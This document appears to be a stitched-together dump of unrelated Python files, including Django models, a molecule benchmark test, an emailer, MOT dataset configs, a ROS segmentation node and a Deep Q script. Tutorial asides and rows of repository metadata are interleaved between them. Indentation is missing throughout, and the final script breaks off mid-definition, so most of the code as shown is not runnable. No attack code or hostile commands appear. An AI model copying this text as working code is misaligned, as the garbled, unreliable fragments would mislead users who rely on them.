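faster = percent_diff_str(0.100, 0.090)   # 10% faster -> green escape
slower = percent_diff_str(0.100, 0.101)   # +1%, within the 5% noise band -> uncolored
```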
class TestMolecule(unittest.TestCase):
def test_isomorphism_valid(self):
'''Tests for molecules that should be valid isomorphisms of each other.'''
test_mol_pairs = (
("Wall of carbon",
"""Carbon;C;00611;10611;20611;30601;01611;12611;11611;21611;31601;32601;22611;02611;03611;13611;23611;33601;34601;24611;14611;04611;05611;15611;25611;35601;36601;26611;16611;06611;07610;17610;27610;37600""",
"Carbon;C;00611;10611;20611;30601;01611;12611;11611;21611;31601;32601;22611;02611;03611;13611;23611;33601;34601;24611;14611;04611;05611;15611;25611;35601;36601;26611;16611;06611;07610;17610;27610;37600"),
("Doping rotated",
"""Silicon;Si;001411;111511;101411;011411;201411;301401;211411;311401;021411;121411;221411;321401;031410;131410;231410;331400""",
"""Silicon;Si;001411;111411;101411;011411;201411;301401;211411;311401;021411;121411;221511;321401;031410;131410;231410;331400"""),
("Pyramid",
"Pyramid;C~01~06;12611;13611;14610;35601;32601;03610;34601;25610;36600;33601;22611;23611;24611;31601;30601;21611",
"Pyramid;C~01~06;33601;22611;23611;24611;31601;30601;21611;12611;13611;14610;35601;32601;03610;34601;25610;36600"),)
global num_subtests
for test_id, mol_A_str, mol_B_str in test_mol_pairs:
test_id = 'test_isomorphism_valid: ' + test_id
with self.subTest(msg=test_id):
num_subtests += 1
mol_A = Molecule.from_json_string(mol_A_str)
mol_B = Molecule.from_json_string(mol_B_str)
self.assertTrue(mol_A.isomorphic(mol_B), "Molecule.isomorphic() unexpectedly returned False")
# Check the time performance of the isomorphism algorithm
timer = Timer('mol_A.isomorphic(mol_B)', globals={'mol_A': mol_A, 'mol_B': mol_B})
if test_id not in LAST_TEST_RESULTS:
loops = max(max(timer.autorange()[0] for _ in range(2)) // 2, 5)
else:
loops = LAST_TEST_RESULTS[test_id]['loops']
min_time = min(timer.repeat(repeat=loops, number=1))
if test_id in LAST_TEST_RESULTS:
metrics_str = f"{min_time:.5f}s (b. of {loops}) ({percent_diff_str(LAST_TEST_RESULTS[test_id]['min_time'], min_time)})"
metrics_str += f" | {test_id}"
else:
metrics_str = f"{min_time:.5f}s (b. of {loops}) (NEW) | {test_id}"
print(metrics_str)
LAST_TEST_RESULTS[test_id] = {'loops': loops, 'min_time': min_time}
if __name__ == '__main__':
test_results_file = Path(__file__).parent / 'last_performance_results.pickle'
if test_results_file.exists():
with test_results_file.open('rb') as f:
LAST_TEST_RESULTS = pickle.load(f)
unittest.main(verbosity=0, exit=False)
print(f"Ran {num_subtests} subtests")
# If successful, write the current times/mem usage to file
with test_results_file.open('wb') as f:
pickle.dump(LAST_TEST_RESULTS, f)
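The benchmark above uses a common `timeit` idiom: `Timer.autorange()` to pick a loop count long enough to measure, then the minimum over `repeat()` as the noise-resistant estimate. The same idiom on a toy statement:

```python
from timeit import Timer

timer = Timer('sum(range(100))')

# autorange() returns (number_of_loops, total_time) for a run long enough to measure
loops, total_time = timer.autorange()

# repeat() returns one total time per repetition; the minimum is the stable estimate
min_time = min(timer.repeat(repeat=3, number=1000))
```

Taking the minimum (rather than the mean) discards delays caused by other processes, which is why the test file stores and compares `min_time`.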
# Discussion/migrations/0003_auto_20180906_1441.py | Arianxx/ShareForum | MIT
# Generated by Django 2.0.5 on 2018-09-06 06:41
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Discussion', '0002_auto_20180613_1819'),
]
operations = [
migrations.RemoveField(
model_name='discussreply',
name='reply_to',
),
migrations.AddField(
model_name='discussreply',
name='reply_to',
field=models.ManyToManyField(related_name='replys_from', to=settings.AUTH_USER_MODEL),
),
]
# ambry/cli/test.py | kball/ambry | BSD-2-Clause
"""
Copyright (c) 2013 Clarinova. This file is licensed under the terms of the
Revised BSD License, included in this distribution as LICENSE.txt
"""
from ..cli import prt,fatal
def test_parser(cmd):
import argparse
test_p = cmd.add_parser('test', help='Test and debugging')
test_p.set_defaults(command='test')
asp = test_p.add_subparsers(title='Test commands', help='command help')
sp = asp.add_parser('config', help='Dump the configuration')
sp.set_defaults(subcommand='config')
sp.add_argument('-v', '--version', default=False, action='store_true', help='Display module version')
sp = asp.add_parser('spatialite', help='Test spatialite configuration')
sp.set_defaults(subcommand='spatialite')
sp = asp.add_parser('gitaccess', help='Test gitaccess')
sp.set_defaults(subcommand='gitaccess')
def test_command(args, rc):
from ..library import new_library
globals()['test_' + args.subcommand](args, rc)
def test_spatialite(args,rc):
from pysqlite2 import dbapi2 as db
import os
f = '/tmp/_db_spatialite_test.db'
if os.path.exists(f):
os.remove(f)
conn = db.connect(f)
conn.execute('select spatialite_version()')
cur = conn.cursor()
try:
conn.enable_load_extension(True)
conn.execute("select load_extension('/usr/lib/libspatialite.so')")
#loaded_extension = True
except AttributeError:
#loaded_extension = False
prt("WARNING: Could not enable load_extension(). ")
rs = cur.execute('SELECT sqlite_version(), spatialite_version()')
for row in rs:
msg = "> SQLite v%s Spatialite v%s" % (row[0], row[1])
print(msg)
def test_gitaccess(args,rc):
from ..source.repository import new_repository
repo = new_repository(rc.sourcerepo('default'))
for e in repo.service.list():
        print(e)
# core/models.py | GuiSilva11/sospet | MIT
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Pet(models.Model):
city = models.CharField(max_length=100)
description = models.TextField()
phone = models.CharField(max_length=11, null=True)
email = models.EmailField(null=True, blank=True)
user = models.ForeignKey(User, on_delete=models.CASCADE)
end_date = models.DateTimeField(null=True, blank=True)
begin_date = models.DateTimeField(auto_now_add=True)
active = models.BooleanField(default=True)
photo = models.ImageField(upload_to='pet', blank=True, null=True)
def __str__(self):
return str(self.id)
class Meta:
        db_table = 'pet_lost'
# 8KYU/first_non_consecutive.py | yaznasivasai/python_codewars | MIT
def first_non_consecutive(arr: list) -> int:
''' This function returns the first element of an array that is not consecutive. '''
if len(arr) < 2:
return None
non_consecutive = []
for i in range(len(arr) - 1):
if arr[i+1] - arr[i] != 1:
non_consecutive.append(arr[i+1])
    if len(non_consecutive) == 0:
        return None
    return non_consecutive[0]
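Exercising the function above — restated here as an equivalent early-return variant so the example runs standalone:

```python
def first_non_consecutive(arr: list):
    '''Return the first element of an array that is not consecutive, else None.'''
    if len(arr) < 2:
        return None
    for i in range(len(arr) - 1):
        if arr[i + 1] - arr[i] != 1:
            return arr[i + 1]
    return None

first_gap = first_non_consecutive([1, 2, 3, 4, 6, 7, 8])   # 6 breaks the run
no_gap = first_non_consecutive([5, 6, 7, 8])               # fully consecutive
```

Returning at the first gap avoids scanning the rest of the array, which the collect-then-slice version does unnecessarily.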
# bitey/cpu/pin.py | jgerrish/bitey | MIT
from dataclasses import dataclass
from enum import Enum
class State(Enum):
"State of a pin, can either be LOW or HIGH"
LOW = 1
HIGH = 2
@dataclass
class Pin:
"""
Physical pins on the microprocessor.
Most of the code in this project is higher-level, ignoring
things like clock-cycles and physical structure of the address
and data bus.
The Pin and Pins classes provide some exceptions to this general rule.
In particular, the reset pin provides a safe start to the initialization
of the processor.
"""
name: str = ""
"Name of the pin"
short_name: str = ""
"Short name of the pin"
state: State = State.LOW
"""
State of the pin, low or high
Default to low, so the processor is in reset mode.
Some other pins may need to be broght high to be in a normal state,
such as the IRQ pin.
"""
def set_high(self):
self.state = State.HIGH
def set_low(self):
self.state = State.LOW
def get(self):
return self.state
@dataclass
class RST(Pin):
"""
The reset pin
When the reset pin is low, the processor is in an uninitialized state.
"""
class IRQ(Pin):
"""
The IRQ pin
When the IRQ line is low, an interrupt has been requested.
Multiple lines may be connected to this pin.
"""
@dataclass
class Pins:
"""
The set of pins on the CPU
"""
pins: list[Pin]
def __post_init__(self):
"Create a dictionary so we can access pins by short name"
self.pin_dict = {}
for f in self.pins:
self.pin_dict[f.short_name] = f
def __getitem__(self, i):
return self.pin_dict[i]
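Typical usage of the classes above — restated in minimal form so the snippet runs without the `bitey` package installed:

```python
from dataclasses import dataclass
from enum import Enum

class State(Enum):
    LOW = 1
    HIGH = 2

@dataclass
class Pin:
    name: str = ""
    short_name: str = ""
    state: State = State.LOW

    def set_high(self):
        self.state = State.HIGH

@dataclass
class Pins:
    pins: list

    def __post_init__(self):
        # Index pins by short name for Pins["RST"]-style access
        self.pin_dict = {p.short_name: p for p in self.pins}

    def __getitem__(self, i):
        return self.pin_dict[i]

pins = Pins([Pin("Reset", "RST"), Pin("Interrupt Request", "IRQ")])
pins["RST"].set_high()   # bring the processor out of reset
```

Because `Pin.state` defaults to `State.LOW`, a freshly constructed processor starts in reset mode, exactly as the docstrings above describe.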
# sme_uniforme_apps/custom_user/urls.py | prefeiturasp/SME-PortalUniforme-BackEnd | MIT
from django.urls import include, path
from rest_framework import routers
from .api.viewsets.usuario_viewset import UsuarioViewset
router = routers.DefaultRouter()
router.register("usuarios", UsuarioViewset, "Usuários")
urlpatterns = [
path('', include(router.urls))
]
| 21.230769 | 56 | 0.775362 | 31 | 276 | 6.83871 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119565 | 276 | 12 | 57 | 23 | 0.872428 | 0 | 0 | 0 | 0 | 0 | 0.057971 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bfa9e9e64bf356bd1cacc359a0d51be50f947a91 | 2,837 | py | Python | Driver/models.py | Anne56njeri/Carpool | b1d95b1307c287a8edca576ad24ccc3b7a8427fc | [
"Unlicense",
"MIT"
] | 1 | 2018-08-01T08:57:44.000Z | 2018-08-01T08:57:44.000Z | Driver/models.py | Anne56njeri/Carpool | b1d95b1307c287a8edca576ad24ccc3b7a8427fc | [
"Unlicense",
"MIT"
] | null | null | null | Driver/models.py | Anne56njeri/Carpool | b1d95b1307c287a8edca576ad24ccc3b7a8427fc | [
"Unlicense",
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
'''
We create a profile class that stores information on whether the user is a
driver or a passenger.
'''
class Profile(models.Model):
username=models.CharField(max_length=40)
profile_image=models.ImageField(upload_to='profiles/')
choices=(('Male','Male'),('Female','Female'))
sex=models.CharField(_('sex'),max_length=30,blank=True,choices=choices)
user_choices=(('Driver','Driver'),('Passenger','Passenger'))
user_type=models.CharField(_('user type'),max_length=30,blank=True,choices=user_choices)
user=models.OneToOneField(User,on_delete=models.CASCADE)
def __str__(self):
return self.username
@receiver(post_save, sender=User)
def update_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
instance.profile.save()
def delete_profile(self):
self.delete()
'''
We create a car model to save information about the car, as users may have preferences.
'''
class Venue(models.Model):
name=models.CharField(max_length=255)
latitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
longitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
    user=models.ForeignKey(Profile, on_delete=models.CASCADE, null=True)
def __str__(self):
return self.name
    def delete_venue(self):
        self.delete()
@classmethod
    def search(cls, search_term):
locations=cls.objects.filter(name__icontains=search_term)
return locations
class Car(models.Model):
car_brand=models.CharField(max_length=30)
Number_plate=models.CharField(max_length=40)
seats_available=models.IntegerField()
    users_car=models.ForeignKey(User, on_delete=models.CASCADE, null=True)
    location=models.ForeignKey(Venue, on_delete=models.CASCADE, null=True)
def __str__(self):
return self.car_brand
'''
We create a driver model to save information about the driver and the car.
'''
'''
We add the car foreign key to the driver model to record that the car belongs to a
specific user, and also to make querying the db easier.
'''
class Driver(models.Model):
start=models.CharField(max_length=40)
destination=models.CharField(max_length=30)
    user=models.ForeignKey(Profile, on_delete=models.CASCADE, null=True)
    car=models.ForeignKey(Car, on_delete=models.CASCADE, null=True)
class Passenger(models.Model):
name=models.CharField(max_length=40)
national_id=models.CharField(max_length=40)
Reviews=models.CharField(max_length=40,blank=True)
    where_are_you=models.ForeignKey(Venue, on_delete=models.CASCADE, null=True)
    user=models.ForeignKey(Profile, on_delete=models.CASCADE, null=True)
Phone_number=models.CharField(max_length=40,null=True)
# taskmanager/src/modules/events/infrastructure/persistence/models/event_model.py | alice-biometrics/petisco-task-manager | MIT
from petisco.persistence.persistence import Persistence
from sqlalchemy import Column, Integer, String, JSON
Base = Persistence.get_base("taskmanager")
class EventModel(Base):
__tablename__ = "Event"
id = Column("id", Integer, primary_key=True)
event_id = Column("event_id", String(36))
type = Column("type", String(100))
data = Column("data", JSON)
| 25 | 55 | 0.712 | 46 | 375 | 5.630435 | 0.521739 | 0.081081 | 0.100386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015924 | 0.162667 | 375 | 14 | 56 | 26.785714 | 0.808917 | 0 | 0 | 0 | 0 | 0 | 0.090667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
# Literature-backend/utils/authorization.py | czl0325/Literature-python3 | MIT
import functools
from flask import g, request
from lib.jwt_utils import verify_jwt
def LoginRequired(view_func):
@functools.wraps(view_func)
def check_auth(*args, **kwargs):
g.user_id = None
auth = request.headers.get('token')
payload = verify_jwt(auth)
if payload:
g.user_id = payload.get('user_id')
return view_func(*args, **kwargs)
else:
from utils.response_code import RET, ResponseData
return ResponseData(RET.TOKENERROR).to_dict()
return check_auth
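`LoginRequired` is the usual decorator-with-wrapper pattern: verify a token from the request, stash the user id, and short-circuit on failure. A framework-free sketch of the same shape — the `verify_token` stub and dict-shaped request are illustrative stand-ins, not part of this project's API:

```python
import functools

def verify_token(token):
    # Stand-in for verify_jwt(): accept one known token, reject everything else.
    return {'user_id': 42} if token == 'good-token' else None

def login_required(view_func):
    @functools.wraps(view_func)
    def check_auth(request, *args, **kwargs):
        payload = verify_token(request.get('token'))
        if payload:
            return view_func(payload['user_id'], *args, **kwargs)
        return {'error': 'token invalid'}
    return check_auth

@login_required
def profile_view(user_id):
    return {'user_id': user_id}

ok = profile_view({'token': 'good-token'})
denied = profile_view({'token': 'bad'})
```

`functools.wraps` preserves the wrapped view's name and docstring, which matters when a framework (or debugger) introspects the registered view functions.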
# backend/emailer.py | amm042/Flower | MIT
import os
import subprocess
import smtplib
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
EMAIL_HTML_START = '<html><head></head><body><p>'
EMAIL_HTML_END = '</p></body></html>'
"""
Send Email with attachments and text
attachments should be a list of objects that can be attached to a MIMEMultipart obj
"""
def sendEmail(sender, receivers, subject, body, attachments, is_body_html=False):
assert type(attachments) is list
assert type(receivers) is list
msg = MIMEMultipart()
text = MIMEText(body, 'html') if is_body_html else MIMEText(body)
# attach elements to email
msg.attach(text)
[msg.attach(attachment) for attachment in attachments]
# me == the sender's email address
# you == the recipient's email address
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ','.join(receivers)
try:
smtpObj = smtplib.SMTP('smtp.bucknell.edu')
smtpObj.sendmail(sender, receivers, msg.as_string())
# TODO: log this message instead of printing to console
print("Successfully sent email")
smtpObj.quit()
    except smtplib.SMTPException as e:
# TODO: log this message instead of printing to console
print("Error: unable to send email: {}".format(e))
"""
Installs highcharts-export-server if not already installed.
Raises ImportError if the export server is not installed at the
expected path and could not be installed.
"""
eServerPath = "./node_modules/.bin/highcharts-export-server"
eServerName = "highcharts-export-server"
def prepareChartExport():
if not os.path.isfile(eServerPath):
if 0 != os.system("module load node && export ACCEPT_HIGHCHARTS_LICENSE=TRUE && npm install " + eServerName):
raise ImportError("Could not install chart export server")
"""
Generates a PNG image from a JSON Object
Assumes highcharts-export-server is present in the working directory
param chartJSON: A JSON string representing the chart being exported.
returns: A PNG MIMEImage object
"""
def exportChart(chartJSON): # TODO: Handle errors
prepareChartExport()
# Write chartJSON into chart.json
fp = open('chart.json', 'w')
fp.write(chartJSON)
fp.close()
# Run export server to create chart.png file
eServerCommand = "module load node && " + eServerPath + " -infile chart.json -outfile chart.png"
subprocess.check_output(eServerCommand, shell=True)
# Return chart.png image
fp = open('chart.png', 'rb') # Open in write binary mode
chartImage = MIMEImage(fp.read())
fp.close()
return chartImage
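`sendEmail` above builds the message with the stdlib `email.mime` classes before handing it to SMTP, so the assembly step can be exercised on its own without a mail server (the addresses here are illustrative):

```python
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

sender = 'sender@example.com'
receivers = ['a@example.com', 'b@example.com']

msg = MIMEMultipart()
msg.attach(MIMEText('<p>hello</p>', 'html'))  # HTML body, as is_body_html=True would produce
msg['Subject'] = 'Report'
msg['From'] = sender
msg['To'] = ','.join(receivers)

raw = msg.as_string()   # the serialized form smtplib.sendmail() would transmit
```

Inspecting `raw` (or the individual headers) in a unit test catches malformed messages long before they reach `smtp.bucknell.edu`.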
# lib/datasets/mot_info.py | liuqk3/GSM | MIT
from lib.utils.misc import detect_os
MOT_info = {
"readme": "The sequences in MOT16 and MOT17 are the same, while the sequences in 2DMOT2015 are "
"not all the same with those in MOT17. To handle this, we filter 2DMOT2015 dataset, "
"i.e. those sequences that are contained in MOT17 will not be included in 2DMOT2015",
'year': ['MOT15', 'MOT16', 'MOT17', 'MOT20'],
'base_path': {
'MOT15': {
'im': '/home/liuqk/Dataset/MOT/2DMOT2015',
'label':'/home/liuqk/Dataset/MOT/2DMOT2015',
},
'MOT16': {
'im': '/home/liuqk/Dataset/MOT/MOT17Det',
'label':'/home/liuqk/Dataset/MOT/MOT16Labels',
},
'MOT17': {
'im': '/home/liuqk/Dataset/MOT/MOT17Det',
'label': '/home/liuqk/Dataset/MOT/MOT17Labels',
},
'MOT20': {
'im': '/home/liuqk/Dataset/MOT/MOT20',
'label': '/home/liuqk/Dataset/MOT/MOT20',
},
'MOT16-det-dpm-raw': '/home/liuqk/Dataset/MOT/MOT16-det-dpm-raw/',
},
'sequences': {
'MOT15': {
'train': ['ETH-Bahnhof', 'ETH-Sunnyday', 'KITTI-13', 'KITTI-17', 'PETS09-S2L1', 'TUD-Campus',
'TUD-Stadtmitte'],
'test': ['ADL-Rundle-1', 'ADL-Rundle-3', 'AVG-TownCentre', 'ETH-Crossing', 'ETH-Jelmoli', 'ETH-Linthescher',
'KITTI-16', 'KITTI-19', 'PETS09-S2L2', 'TUD-Crossing', 'Venice-1'],
'val': []
},
'MOT16': {
'train': ['MOT16-04', 'MOT16-11', 'MOT16-05', 'MOT16-13', 'MOT16-02'], #, 'MOT16-10', 'MOT16-09'],
            'test': ['MOT16-12', 'MOT16-03', 'MOT16-01', 'MOT16-06', 'MOT16-07', 'MOT16-08', 'MOT16-14'],
'val': ['MOT16-09', 'MOT16-10']
},
'MOT17': {
'train': ['MOT17-04', 'MOT17-11', 'MOT17-05', 'MOT17-13', 'MOT17-02'],
'test': ['MOT17-03', 'MOT17-01', 'MOT17-06', 'MOT17-07', 'MOT17-08', 'MOT17-12', 'MOT17-14'],
'val': ['MOT17-10', 'MOT17-09']
},
'MOT20':{
'train':['MOT20-01', 'MOT20-02', 'MOT20-03', 'MOT20-05'],
'test': ['MOT20-04', 'MOT20-06', 'MOT20-07', 'MOT20-08'],
'val': [],
},
},
'detectors': {
'MOT15': {
'train': [''],
'val': [''],
'test': ['']
},
'MOT16': {
'train': [''],
'val': [''],
'test': ['']
},
'MOT17': {
'train': ['DPM'],
'val': ['DPM'], #['SDP', 'FRCNN', 'DPM'],
'test': ['DPM', 'SDP', 'FRCNN']
},
'MOT20': {
'train': [''],
'val': [''],
'test': ['']
},
},
}
def get_mot_info():
mot_info = MOT_info.copy()
# modify the path based on the OS
operate_system = detect_os()
if operate_system == 'MAC_OS_X':
base_path = {
'MOT15': {
'im': '/Users/Qiankun/Learning/Dataset/MOT/2DMOT2015',
'label': '/Users/Qiankun/Learning/Dataset/MOT/2DMOT2015',
},
'MOT16': {
'im': '/Users/Qiankun/Learning/Dataset/MOT/MOT17Det',
'label': '/Users/Qiankun/Learning/Dataset/MOT/MOT16Labels',
},
'MOT17': {
'im': '/Users/Qiankun/Learning/Dataset/MOT/MOT17Det',
'label': '/Users/Qiankun/Learning/Dataset/MOT/MOT17Labels',
},
'MOT20': {
'im': '/Users/Qiankun/Learning/Dataset/MOT/MOT20',
'label': '/Users/Qiankun/Learning/Dataset/MOT/MOT20',
},
'MOT16-det-dpm-raw': '/home/liuqk/Dataset/MOT/MOT16-det-dpm-raw/',
}
elif operate_system == 'WINDOWS':
        base_path = {
            # raw strings avoid backslash-escape issues in Windows paths
            'MOT15': {
                'im': r'F:\Datasets\MOT\2DMOT2015',
                'label': r'F:\Datasets\MOT\2DMOT2015',
            },
            'MOT16': {
                'im': r'F:\Datasets\MOT\MOT16',
                'label': r'F:\Datasets\MOT\MOT16',
            },
            'MOT17': {
                'im': r'F:\Datasets\MOT\MOT17',
                'label': r'F:\Datasets\MOT\MOT17',
            },
            'MOT20': {
                'im': r'F:\Datasets\MOT\MOT20',
                'label': r'F:\Datasets\MOT\MOT20',
            },
            'MOT16-det-dpm-raw': '/home/liuqk/Dataset/MOT/MOT16-det-dpm-raw/',
        }
elif operate_system == 'LINUX':
base_path = {
'MOT15': {
'im': '/home/liuqk/Dataset/MOT/2DMOT2015',
'label': '/home/liuqk/Dataset/MOT/2DMOT2015',
},
'MOT16': {
# 'im': '/home/liuqk/Dataset/MOT/MOT17Det',
# 'label': '/home/liuqk/Dataset/MOT/MOT16Labels',
'im': '/home/liuqk/Dataset/MOT/MOT16',
'label':'/home/liuqk/Dataset/MOT/MOT16',
},
'MOT17': {
# 'im': '/home/liuqk/Dataset/MOT/MOT17Det',
# 'label': '/home/liuqk/Dataset/MOT/MOT17Labels',
'im': '/home/liuqk/Dataset/MOT/MOT17',
'label':'/home/liuqk/Dataset/MOT/MOT17',
},
'MOT20': {
'im': '/home/liuqk/Dataset/MOT/MOT20',
'label': '/home/liuqk/Dataset/MOT/MOT20',
},
'MOT16-det-dpm-raw': '/home/liuqk/Dataset/MOT/MOT16-det-dpm-raw/',
}
else:
        raise NotImplementedError('Unknown operating system {}'.format(operate_system))
mot_info['base_path'] = base_path
return mot_info
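get_mot_info() above swaps the dataset roots according to detect_os(). A minimal, self-contained sketch of the same OS-switch pattern — platform.system() and the sample roots below are stand-ins for lib.utils.misc.detect_os and the real paths:

```python
import platform

def detect_os_sketch():
    # Map platform.system() onto the labels used by get_mot_info(); 'Darwin' is macOS
    return {'Darwin': 'MAC_OS_X', 'Windows': 'WINDOWS', 'Linux': 'LINUX'}.get(
        platform.system(), 'UNKNOWN')

def base_path_for(os_name):
    # Hypothetical roots, one per supported OS, mirroring the branches above
    roots = {
        'MAC_OS_X': '/Users/me/Dataset/MOT',
        'WINDOWS': r'C:\Datasets\MOT',
        'LINUX': '/home/me/Dataset/MOT',
    }
    if os_name not in roots:
        raise NotImplementedError('Unknown operating system {}'.format(os_name))
    return roots[os_name]

print(base_path_for('LINUX'))  # /home/me/Dataset/MOT
```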
# src/dama/data/web.py (repo: elaeon/dama_ml, Apache-2.0 license)
import tqdm
class HttpDataset(object):
def __init__(self, url, sess=None):
self.url = url
self.sess = sess
def download(self, filepath, chunksize):
response = self.sess.get(self.url)
with open(filepath, "wb") as f:
for chunk in tqdm.tqdm(response.iter_content(chunksize)):
if chunk:
f.write(chunk)
f.flush()
def from_data(self, dataset, chunksize=258):
self.download(dataset.filepath, chunksize=chunksize)
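HttpDataset.download streams response chunks to disk. A rough, self-contained usage sketch with stub objects standing in for a real HTTP session and response (no network access assumed; the tqdm progress bar is omitted so the sketch runs with the standard library only):

```python
import os
import tempfile

class StubResponse(object):
    """Mimics the minimal response API that HttpDataset.download relies on."""
    def __init__(self, payload):
        self._payload = payload

    def iter_content(self, chunksize):
        # Yield the payload in fixed-size slices, like requests' iter_content
        for off in range(0, len(self._payload), chunksize):
            yield self._payload[off:off + chunksize]

class StubSession(object):
    """Stands in for a real HTTP session object; returns canned bytes."""
    def __init__(self, payload):
        self._payload = payload

    def get(self, url):
        return StubResponse(self._payload)

def download(url, sess, filepath, chunksize):
    # The same streaming loop as HttpDataset.download, minus the tqdm bar
    response = sess.get(url)
    with open(filepath, "wb") as f:
        for chunk in response.iter_content(chunksize):
            if chunk:
                f.write(chunk)
                f.flush()

payload = b'x' * 1000
path = os.path.join(tempfile.mkdtemp(), 'data.bin')
download('http://example.invalid/data.bin', StubSession(payload), path, chunksize=258)
```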
# deeplab_segment.py (repo: Prakadeeswaran05/Tf-ObjectDetection-SemanticSegmentation-ROS, MIT license)
import collections
import os
import io
import sys
import tarfile
import tempfile
import urllib
import rospy
from std_msgs.msg import Header
from sensor_msgs.msg import Image as ros_img
from notcv_bridge import *
from matplotlib import gridspec
from matplotlib import pyplot as plt
import numpy as np
from PIL import Image
import cv2
from model import DeepLabModel
import get_dataset_colormap
_TARBALL_NAME = 'deeplab_mnv3_large_cityscapes_trainfine_2019_11_15.tar.gz'
model_dir = '/home/ros/tf_ws/src/obj_det/scripts'
file_path = os.path.join(model_dir, _TARBALL_NAME)
model = DeepLabModel(file_path)
def callback(data):
out = imgmsg_to_cv2(data)
cv2_im = cv2.cvtColor(out, cv2.COLOR_BGR2RGB)
pil_im = Image.fromarray(cv2_im)
# Run model
resized_im, seg_map = model.run(pil_im)
# Adjust color of mask
seg_image = get_dataset_colormap.label_to_color_image(
seg_map, get_dataset_colormap.get_cityscapes_name()).astype(np.uint8)
# Convert PIL image back to cv2 and resize
frame = np.array(pil_im)
r = seg_image.shape[1] / frame.shape[1]
dim = (int(frame.shape[0] * r), seg_image.shape[1])[::-1]
resized = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)
seg_image = cv2.cvtColor(seg_image, cv2.COLOR_RGB2BGR)
resized = cv2.cvtColor(resized, cv2.COLOR_RGB2BGR)
# Stack horizontally color frame and mask
color_and_mask = np.hstack((resized, seg_image))
print(color_and_mask.shape)
cv2.imshow('frame', color_and_mask)
cv2.waitKey(1)
def main():
rospy.init_node('image_sub', anonymous=True)
rospy.Subscriber('camera/image_raw',ros_img,callback)
rospy.spin()
if __name__ == '__main__':
main()
cv2.destroyAllWindows()
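In the callback above, the camera frame is resized so its width matches the segmentation mask before np.hstack. A quick pure-Python check of that dim arithmetic — shapes are (height, width) tuples, and no OpenCV is assumed:

```python
def resize_dim(frame_shape, seg_shape):
    # Ratio of mask width to frame width scales the frame's height
    r = seg_shape[1] / frame_shape[1]
    # cv2.resize expects (width, height), hence the [::-1] reversal
    return (int(frame_shape[0] * r), seg_shape[1])[::-1]

print(resize_dim((480, 640), (513, 1024)))  # (1024, 768)
```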
# dnctest.py (repo: nburn42/nburn42_deep_q, MIT license)
# Deep Q network
import gym
import numpy as np
import tensorflow as tf
import math
import random
import bisect
import nplot
# HYPERPARAMETERS
H = 150
H2 = 150
batch_number = 500
gamma = 0.995
num_of_ticks_between_q_copies = 1000
explore_decay = 0.99999
min_explore = 0.05
max_steps = 499
max_episodes = 1500
memory_size = 20000
learning_rate = 1e-3
if __name__ == '__main__':
env = gym.make('LunarLander-v2')
env.monitor.start('training_dir', force=True)
#Setup tensorflow
print env.observation_space
print env.action_space
inputsize = env.observation_space.shape[0]
outputsize = env.action_space.n
tf.reset_default_graph()
    # --- experimental LSTM controller scaffolding (left unfinished in the
    # original and unused by the Q-network below); made syntactically valid ---
    from tensorflow.python.ops import rnn_cell

    input_width = 10
    hidden_width = 10
    lstm_width = input_width + hidden_width + hidden_width
    lstm_size = 50
    lstm_layer_count = 3
    lstm_layers = []

    x_placeholder = tf.placeholder(tf.float32, [None, input_width])
    # tf.zeros cannot take a None batch dimension, so feed the initial
    # hidden/cell states through placeholders instead
    hl_0 = tf.placeholder(tf.float32, [None, hidden_width])
    ht_0 = tf.placeholder(tf.float32, [None, hidden_width])
    state = tf.concat(1, [x_placeholder, hl_0, ht_0])
    print "state size: ", state.get_shape()

    lstm = rnn_cell.BasicLSTMCell(lstm_size, state_is_tuple=False)
    stacked_lstm = rnn_cell.MultiRNNCell([lstm] * lstm_layer_count,
                                         state_is_tuple=False)

    # hand-rolled input/forget gates; the per-layer build loop was never
    # completed, so only these two gates are defined
    wi = tf.Variable(tf.random_uniform([lstm_width, lstm_width], -.01, .01))
    bi = tf.Variable(tf.random_uniform([lstm_width], -.01, .01))
    wf = tf.Variable(tf.random_uniform([lstm_width, lstm_width], -.01, .01))
    bf = tf.Variable(tf.random_uniform([lstm_width], -.01, .01))
    i = tf.sigmoid(tf.matmul(state, wi) + bi)
#First Q Network
w1 = tf.Variable(tf.random_uniform([inputsize,H], -.10, .10))
bias1 = tf.Variable(tf.random_uniform([H], -.10, .10))
w2 = tf.Variable(tf.random_uniform([H, H2], -.10, .10))
bias2 = tf.Variable(tf.random_uniform([H2], -.10, .10))
w3 = tf.Variable(tf.random_uniform([H2, outputsize], -.10, .10))
bias3 = tf.Variable(tf.random_uniform([outputsize], -.10, .10))
w1_prime = tf.Variable(tf.random_uniform([inputsize,H], -1.0, 1.0))
bias1_prime = tf.Variable(tf.random_uniform([H], -1.0, 1.0))
